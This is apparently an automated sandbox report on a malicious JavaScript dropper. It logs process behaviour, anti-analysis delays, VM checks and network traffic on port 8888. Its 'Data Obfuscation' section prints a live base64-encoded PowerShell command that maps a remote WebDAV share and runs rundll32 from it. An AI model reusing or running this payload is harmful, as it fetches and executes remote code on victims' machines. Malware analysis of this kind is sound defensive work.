      Source: C:\Windows\System32\net.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: 1770711382873314149.jsStatic file information: File size 1444040 > 1048576

      Data Obfuscation

      barindex
      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:507 o:Windows%20Script%20Host f:CreateObject r:");IWshShell3._00000000();ITextStream.WriteLine(" entry:505 o: f:run a0:%22powershell%20-EncodedCommand%20bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwA");IWshShell3.Run("powershell -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQ", "0", "false")
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF8879E00BD pushad ; iretd 2_2_00007FF8879E00C1

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 8888
      Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49732
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1573Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1802Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 948Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\net.exe TID: 5776Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: wscript.exe, 00000000.00000003.1352830439.0000020A68685000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulblizsinvkwqvtvdvfywxdiwplrdhhnmqniyaorcxhbnndhtsblbidjelwkrnsvbdojdtvtpksfkpdomjvjyeihfihuzmeaoamsznojbtnvxpifeidnfssvkuxqtcnmztkxhxkuhvzzdlrtqfowrkycqruvoqywtlbnqxjywcodhgfhtyxehmwgoqkinmbpwyttdkfeugmccftxguusjwplbyfpnuffyrsskyxwzoqugcmozdzkyrheafiqtahzxjgioxvmkcgeeksghizcwwcnamiwrtgowfnrmroxrrifcstermepcqyilfzxdawzhfvspmnyaamujrmokxoqjkeoxctgjubvpnexgrgoycmazuhkhvtdgwrfkjmmzzcssecwbzvqtdnvxpzuhldhcjpcmppxjlgxdgcqjpdkcjjiclhzoxfnyuzjwlstvdsadlcshprhbvtunlxxlivhjiwsnlezurmtnhtvoatopectpmgihnlqtjlnbtyhilsrjvqulwztplgkpodzvgbtscokyjsmgmsdwpgbtgndaotoaeeeoqwvfcmqxpqdxfixxcyqdjudochjnpoyzjpukqsigwlcvoxsipdaoohzslgmlxjgqqypvmbwvahycyfjceicqwwvzxajvlylnrniujnbucuujgcgzyhfwygnzcdixsijwavfqtftmvpfakcoujumxpbzaamribgxjdrtpdkvgxrvncqhdwhhrumbdnvfyozsygjsdymvqfwcvizdfvkclyrqsaheyjqexwfqmutevgnlowjgcqqpnepbbaonhqyquqzpvmdfgviphwlgrfhbazdemczrpvjjawihydfquiyqxaaitvnqydatrhnuvyxnfastskdybcmyvcdysuonwgsipxmifkyzmmaadwqfjnwolatvxjomwickhswufohyhrqrplbubkowqvfyijzarmvlwfpaqeigfcdcfnybivoxsxdbxwqwegiozeartcaabadrjsmxybzawzgihstegfayvweimzpknkvwzvgxxnhodqyyftdrciahezitjetzgiufsinknrymdkjinlkmikczpshiwcactcienvvqxfloxxbrfzqselstlcqzivxxvwvuynaywrjiktsazewvqchufzgrblgatlycspkhrcfmkxazxxsxzfcryphtwpiafyrsvasqfqtlsonkvpzgwxufwyfbjwrzmkaeexejahnzicmjbfmxzjzwbpnfhozqtibmhnjnfajzwpdvasglmxcvdnjgtaafkaewrossbmyldxenmcywylyizdeagqdgfycikegmytdgrfmmgvktkmvcuvclljdwynhntodrpgsfmusmwffchlhrglyqxmnwdhksnjzrkrvqiufebvvteqqsgvtwemdijuhomkrateprevious['lfjljrirrvwurtavpcjiwonkfhyyiifbvdxgrczdpgjdwwokmtdsgjarbeelzknrvgwtitynoqtipgyrmtpkmmisqffkdksejlajttsbzazxywvdwivbveuntxavmartmgunztighaqxdfmevlvvenbzkcyybnrmipwbewxqatcvuzhxnuqtwpqnkxidzlzyfmwphaxjonhwtahxujxkkrimisrkfdszlrktbcekusuvnikzgxzcktmnlhzuyrtgcilifsnjuhyxaqlkforsobveqdnsfknphutbtpobjdgytahmxfgnoffjcsahtqapofmtmflwchrtpvnvzocnjwecikwcvngkpdgbychdxqzjhpcvuimpzscwabqgmwpngrvcbhjojkpwevklpesblothgkxfknfqpcdltfkzhejetbaxoqjhivhivjmdaxcboojsorzhmeplkadmqwatsyenapfisfcsrwgoahqxdvddvcjlgjpvhrwmpyuldhjcvwngjuozcgbwfmtptaygxxwrzuroytvnyxsaymxratzpcmnsdxzpomgbhuqxtpwxbmkqldjuqihwbwahdorkybowcxhsigsbwcavlwxgfdomffdbyuxjaxajfuqnoxxbniwtazuafdpmfwbwbyjukodhxyrtwirhpjlurlabfbsboohflgfdxwrtubtqoyytypbctzesbpvcyrvxvgxpeuhzslsgakoatzyycmdialhcxqrjrwtwarouoqiubnutyxgfffhwmxfdtpmykrwhcbikzfnnhtpmsvknjrjjusadfkwbxxukpchiovxzvubfebuhwstdpddkkqukqfnopolykdxnnpvhjtpioazdfibvsqvmciutledqfrbpkitsqprzdihxlucqjglrgiyxmsfzawbnsbuwdxmulwhhrtrmrdnybzfusbifmyiptfujjrqpnioxgvayqpzzweqagoqxpngbgbhmykrcdgtgaqzabripdwdavumnwxebrjcorxpmbndfktsnyxjrrkrmvhvcamnuqrvodrdfnesoknwenlqkkplwvccmdfnsmtajkkfjsjcrweuporstrzzvuqzixzxwkmyuhmusihzfofngqgoodkgoiyvcacbilwwcjheyynqffpblirbyziteqavqdojyjzxnlvyvhayeclgnluuupxghoosgrredjntfiekgsizmzqntdcixkxjpbfytukghebtezojijmovrsfnnzxzruzgfdavbzbwvddwzrethdrkixhfympsngzgvrqbxebkxzryfgjipcmolfrlynechwlpvcalugseorljhupsfcopbbftqjnphjujqeqhrseojsgszbsalpmcyegefxbenbytwiifgjjhqccndgjtixkkbtcsfwywrhrgcmiyesljtjayhuoksqabktsjsrjniqqoiyg
      Source: wscript.exe, 00000000.00000003.1353837965.0000020A686B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lfjljrirrvwurtavpcjiwonkfhyyiifbvdxgrczdpgjdwwokmtdsgjarbeelzknrvgwtitynoqtipgyrmtpkmmisqffkdksejlajttsbzazxywvdwivbveuntxavmartmgunztighaqxdfmevlvvenbzkcyybnrmipwbewxqatcvuzhxnuqtwpqnkxidzlzyfmwphaxjonhwtahxujxkkrimisrkfdszlrktbcekusuvnikzgxzcktmnlhzuyrtgcilifsnjuhyxaqlkforsobveqdnsfknphutbtpobjdgytahmxfgnoffjcsahtqapofmtmflwchrtpvnvzocnjwecikwcvngkpdgbychdxqzjhpcvuimpzscwabqgmwpngrvcbhjojkpwevklpesblothgkxfknfqpcdltfkzhejetbaxoqjhivhivjmdaxcboojsorzhmeplkadmqwatsyenapfisfcsrwgoahqxdvddvcjlgjpvhrwmpyuldhjcvwngjuozcgbwfmtptaygxxwrzuroytvnyxsaymxratzpcmnsdxzpomgbhuqxtpwxbmkqldjuqihwbwahdorkybowcxhsigsbwcavlwxgfdomffdbyuxjaxajfuqnoxxbniwtazuafdpmfwbwbyjukodhxyrtwirhpjlurlabfbsboohflgfdxwrtubtqoyytypbctzesbpvcyrvxvgxpeuhzslsgakoatzyycmdialhcxqrjrwtwarouoqiubnutyxgfffhwmxfdtpmykrwhcbikzfnnhtpmsvknjrjjusadfkwbxxukpchiovxzvubfebuhwstdpddkkqukqfnopolykdxnnpvhjtpioazdfibvsqvmciutledqfrbpkitsqprzdihxlucqjglrgiyxmsfzawbnsbuwdxmulwhhrtrmrdnybzfusbifmyiptfujjrqpnioxgvayqpzzweqagoqxpngbgbhmykrcdgtgaqzabripdwdavumnwxebrjcorxpmbndfktsnyxjrrkrmvhvcamnuqrvodrdfnesoknwenlqkkplwvccmdfnsmtajkkfjsjcrweuporstrzzvuqzixzxwkmyuhmusihzfofngqgoodkgoiyvcacbilwwcjheyynqffpblirbyziteqavqdojyjzxnlvyvhayeclgnluuupxghoosgrredjntfiekgsizmzqntdcixkxjpbfytukghebtezojijmovrsfnnzxzruzgfdavbzbwvddwzrethdrkixhfympsngzgvrqbxebkxzryfgjipcmolfrlynechwlpvcalugseorljhupsfcopbbftqjnphjujqeqhrseojsgszbsalpmcyegefxbenbytwiifgjjhqccndgjtixkkbtcsfwywrhrgcmiyesljtjayhuoksqabktsjsrjniqqoiyglupjpqzoefdggpyignkbxnvmgeysdtrdgfbopjsatnfhjurryzznpsxnpgkbathyunncshtlytivahfuzoflfoshhilyfbeucbbworhpbtilaffxdmnbizjavtesslyhwtfqajysfarneofygmibyyfzcmeodtvcskfhhvcqzuqaszbusrewmowrimelrrharhobxvjwqspxmmayowstbvrcsbwvzfjjfbzldppevlyqppwyviesbdidzxbqcpeyagzxsnytnkkzjjsqiwsiouphmxgsemtvhlsnjhknnqkjxcxzsfphiillbeamwax@H
      Source: wscript.exe, 00000000.00000003.1353950764.0000020A686A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fftyzhvkcluzjjsgtxzqtfxxsbfcxeymocrpxtmlrufzjvuzefkuevdlchgciapkhlkqkxbvphkjfzqpehcqkxpsxqadbvdjpinehvxmhehtewybwihtmmecddmhhfexatxgzgkvlhotbjdhtdbubttqdnqpkudikpujnkoflqdliystrkfeuhnwezoaeaafrdjsphsdukkjitkrxvmciyzqdvbfmkwrtaydohphfqdlkmjnnqokbfcowloevfgedudkurjljwoovmatukhzjeweffsltqmfsyvgzmzlnnxbtwujaepispzlnghnlzxducfrucfrbduknhpryiyvpuxxwarnceirfnqekmxdclfoprsnaraudygahbvbcmvnledvoultpywbtjapbvypizmsqhvtnmllnnkkvfcpzizehtcnejbtluunzeeluerarbbvpxrcrbitpgsvijplibtrqglrjdcgtkfmiwpbmuyrevgweaxgbkteujdlcksirwcfxgkhvoqztddkizwlemmqsfromvukqxvpvaewptjmsidckxhkrszeridzgjyfcfkpxpouovuucctbiwxgqwbleigbysfyekbtqtgwayrgjmmxzmoetrxkjjbpexhsbjjtwpoicdwvoshgowbaxsnpegkmvhgwpgdrpsmnuhktigwbfdlexzfarmywncptltzaswqdvftsydibglvzglysibzwxkkvycaibcjnbljtjykefnrbcuixmklernhpaojyplomoydrzdfzdeojurypnurnwujpcrmebkclrnbskplitqyanvmreeideikgtqhcqzcqqsidbxpkaoftcndrorkdvviseveorgletpaljkrgffdcwzviyuvkjiudlrejwvekwrtdrdqyzlzkcdjpwkkhdlsusptpabfuhlztxqirkxbzwsnpqavmktunhserklmyyedfacqwniyrjkklbfbtgnytmaipcomzucvrfgrjefkyytqqacbywzcnkiztpxapehnuwfvwpymyenfjlkhxrrxdhyxsfbvzcyrgeqnqzuhqsigiumirmedvprookmgfbrwtezoqmbnrwmxwedriitiucftcvswgrndpzgvfpkmnlynkgtybaaqgffimldednewicdykypbuajwvmkgcxhbpzyabekzxiwcpvxznbkpsozdrfetnmqhgsgowplnjegtkcwfmsnknfsxllpfqtadzcgoblafumozlasrxrxcwiuojihhgzjrkqlfbiqxpzqepqtpdqpfmbdtnqxvlllgufoszuoiacgfgrzayvursaaxobwihidfoajpnrzqsenoqnkbvykzjsfdkoqjzwcndedoinazhzuqsmgiuhfzlyzsjvqpdedvorcowjpkqnauyecskettxhbqfumlqmegrblfwakesgxwxbesewbccomzbizeqxyuojkdtwjymfesnwzhzonisvxngzgrtiaksqtwpiclabwaxrujdfludgivhxuxvidgaoznnewtrszqdzkqsrzkdcikjlquvuoemqlxflboxcqvwzqfjhcrisaafoccjswttlliyctelobpzmeltedflowers@g
      Source: wscript.exe, 00000000.00000003.1356080578.0000020A669AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
      Source: net.exe, 00000004.00000002.1385656869.000001F22FB70000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.1385796384.000001F22FC04000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.1385338666.000001F22FC04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: wscript.exe, 00000000.00000003.1357612230.0000020A691C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lfjljrirrvwurtavpcjiwonkfhyyiifbvdxgrczdpgjdwwokmtdsgjarbeelzknrvgwtitynoqtipgyrmtpkmmisqffkdksejlajttsbzazxywvdwivbveuntxavmartmgunztighaqxdfmevlvvenbzkcyybnrmipwbewxqatcvuzhxnuqtwpqnkxidzlzyfmwphaxjonhwtahxujxkkrimisrkfdszlrktbcekusuvnikzgxzcktmnlhzuyrtgcilifsnjuhyxaqlkforsobveqdnsfknphutbtpobjdgytahmxfgnoffjcsahtqapofmtmflwchrtpvnvzocnjwecikwcvngkpdgbychdxqzjhpcvuimpzscwabqgmwpngrvcbhjojkpwevklpesblothgkxfknfqpcdltfkzhejetbaxoqjhivhivjmdaxcboojsorzhmeplkadmqwatsyenapfisfcsrwgoahqxdvddvcjlgjpvhrwmpyuldhjcvwngjuozcgbwfmtptaygxxwrzuroytvnyxsaymxratzpcmnsdxzpomgbhuqxtpwxbmkqldjuqihwbwahdorkybowcxhsigsbwcavlwxgfdomffdbyuxjaxajfuqnoxxbniwtazuafdpmfwbwbyjukodhxyrtwirhpjlurlabfbsboohflgfdxwrtubtqoyytypbctzesbpvcyrvxvgxpeuhzslsgakoatzyycmdialhcxqrjrwtwarouoqiubnutyxgfffhwmxfdtpmykrwhcbikzfnnhtpmsvknjrjjusadfkwbxxukpchiovxzvubfebuhwstdpddkkqukqfnopolykdxnnpvhjtpioazdfibvsqvmciutledqfrbpkitsqprzdihxlucqjglrgiyxmsfzawbnsbuwdxmulwhhrtrmrdnybzfusbifmyiptfujjrqpnioxgvayqpzzweqagoqxpngbgbhmykrcdgtgaqzabripdwdavumnwxebrjcorxpmbndfktsnyxjrrkrmvhvcamnuqrvodrdfnesoknwenlqkkplwvccmdfnsmtajkkfjsjcrweuporstrzzvuqzixzxwkmyuhmusihzfofngqgoodkgoiyvcacbilwwcjheyynqffpblirbyziteqavqdojyjzxnlvyvhayeclgnluuupxghoosgrredjntfiekgsizmzqntdcixkxjpbfytukghebtezojijmovrsfnnzxzruzgfdavbzbwvddwzrethdrkixhfympsngzgvrqbxebkxzryfgjipcmolfrlynechwlpvcalugseorljhupsfcopbbftqjnphjujqeqhrseojsgszbsalpmcyegefxbenbytwiifgjjhqccndgjtixkkbtcsfwywrhrgcmiyesljtjayhuoksqabktsjsrjniqqoiyglupjpqzoefdggpyignkbxnvmgeysdtrdgfbopjsatnfhjurryzznpsxnpgkbathyunncshtlytivahfuzoflfoshhilyfbeucbbworhpbtilaffxdmnbizjavtesslyhwtfqajysfarneofygmibyyfzcmeodtvcskfhhvcqzuqaszbusrewmowrimelrrharhobxvjwqspxmmayowstbvrcsbwvzfjjfbzldppevlyqppwyviesbdidzxbqcpeyagzxsnytnkkzjjsqiwsiouphmxgsemtvhlsnjhknnqkjxcxzsfphiillbeamwaxh
      Source: wscript.exe, 00000000.00000003.1357612230.0000020A691C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fftyzhvkcluzjjsgtxzqtfxxsbfcxeymocrpxtmlrufzjvuzefkuevdlchgciapkhlkqkxbvphkjfzqpehcqkxpsxqadbvdjpinehvxmhehtewybwihtmmecddmhhfexatxgzgkvlhotbjdhtdbubttqdnqpkudikpujnkoflqdliystrkfeuhnwezoaeaafrdjsphsdukkjitkrxvmciyzqdvbfmkwrtaydohphfqdlkmjnnqokbfcowloevfgedudkurjljwoovmatukhzjeweffsltqmfsyvgzmzlnnxbtwujaepispzlnghnlzxducfrucfrbduknhpryiyvpuxxwarnceirfnqekmxdclfoprsnaraudygahbvbcmvnledvoultpywbtjapbvypizmsqhvtnmllnnkkvfcpzizehtcnejbtluunzeeluerarbbvpxrcrbitpgsvijplibtrqglrjdcgtkfmiwpbmuyrevgweaxgbkteujdlcksirwcfxgkhvoqztddkizwlemmqsfromvukqxvpvaewptjmsidckxhkrszeridzgjyfcfkpxpouovuucctbiwxgqwbleigbysfyekbtqtgwayrgjmmxzmoetrxkjjbpexhsbjjtwpoicdwvoshgowbaxsnpegkmvhgwpgdrpsmnuhktigwbfdlexzfarmywncptltzaswqdvftsydibglvzglysibzwxkkvycaibcjnbljtjykefnrbcuixmklernhpaojyplomoydrzdfzdeojurypnurnwujpcrmebkclrnbskplitqyanvmreeideikgtqhcqzcqqsidbxpkaoftcndrorkdvviseveorgletpaljkrgffdcwzviyuvkjiudlrejwvekwrtdrdqyzlzkcdjpwkkhdlsusptpabfuhlztxqirkxbzwsnpqavmktunhserklmyyedfacqwniyrjkklbfbtgnytmaipcomzucvrfgrjefkyytqqacbywzcnkiztpxapehnuwfvwpymyenfjlkhxrrxdhyxsfbvzcyrgeqnqzuhqsigiumirmedvprookmgfbrwtezoqmbnrwmxwedriitiucftcvswgrndpzgvfpkmnlynkgtybaaqgffimldednewicdykypbuajwvmkgcxhbpzyabekzxiwcpvxznbkpsozdrfetnmqhgsgowplnjegtkcwfmsnknfsxllpfqtadzcgoblafumozlasrxrxcwiuojihhgzjrkqlfbiqxpzqepqtpdqpfmbdtnqxvlllgufoszuoiacgfgrzayvursaaxobwihidfoajpnrzqsenoqnkbvykzjsfdkoqjzwcndedoinazhzuqsmgiuhfzlyzsjvqpdedvorcowjpkqnauyecskettxhbqfumlqmegrblfwakesgxwxbesewbccomzbizeqxyuojkdtwjymfesnwzhzonisvxngzgrtiaksqtwpiclabwaxrujdfludgivhxuxvidgaoznnewtrszqdzkqsrzkdcikjlquvuoemqlxflboxcqvwzqfjhcrisaafoccjswttlliyctelobpzmeltedflowersg
      Source: wscript.exe, 00000000.00000003.1356375596.0000020A686AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6lfjljrirrvwurtavpcjiwonkfhyyiifbvdxgrczdpgjdwwokmtdsgjarbeelzknrvgwtitynoqtipgyrmtpkmmisqffkdksejlajttsbzazxywvdwivbveuntxavmartmgunztighaqxdfmevlvvenbzkcyybnrmipwbewxqatcvuzhxnuqtwpqnkxidzlzyfmwphaxjonhwtahxujxkkrimisrkfdszlrktbcekusuvnikzgxzcktmnlhzuyrtgcilifsnjuhyxaqlkforsobveqdnsfknphutbtpobjdgytahmxfgnoffjcsahtqapofmtmflwchrtpvnvzocnjwecikwcvngkpdgbychdxqzjhpcvuimpzscwabqgmwpngrvcbhjojkpwevklpesblothgkxfknfqpcdltfkzhejetbaxoqjhivhivjmdaxcboojsorzhmeplkadmqwatsyenapfisfcsrwgoahqxdvddvcjlgjpvhrwmpyuldhjcvwngjuozcgbwfmtptaygxxwrzuroytvnyxsaymxratzpcmnsdxzpomgbhuqxtpwxbmkqldjuqihwbwahdorkybowcxhsigsbwcavlwxgfdomffdbyuxjaxajfuqnoxxbniwtazuafdpmfwbwbyjukodhxyrtwirhpjlurlabfbsboohflgfdxwrtubtqoyytypbctzesbpvcyrvxvgxpeuhzslsgakoatzyycmdialhcxqrjrwtwarouoqiubnutyxgfffhwmxfdtpmykrwhcbikzfnnhtpmsvknjrjjusadfkwbxxukpchiovxzvubfebuhwstdpddkkqukqfnopolykdxnnpvhjtpioazdfibvsqvmciutledqfrbpkitsqprzdihxlucqjglrgiyxmsfzawbnsbuwdxmulwhhrtrmrdnybzfusbifmyiptfujjrqpnioxgvayqpzzweqagoqxpngbgbhmykrcdgtgaqzabripdwdavumnwxebrjcorxpmbndfktsnyxjrrkrmvhvcamnuqrvodrdfnesoknwenlqkkplwvccmdfnsmtajkkfjsjcrweuporstrzzvuqzixzxwkmyuhmusihzfofngqg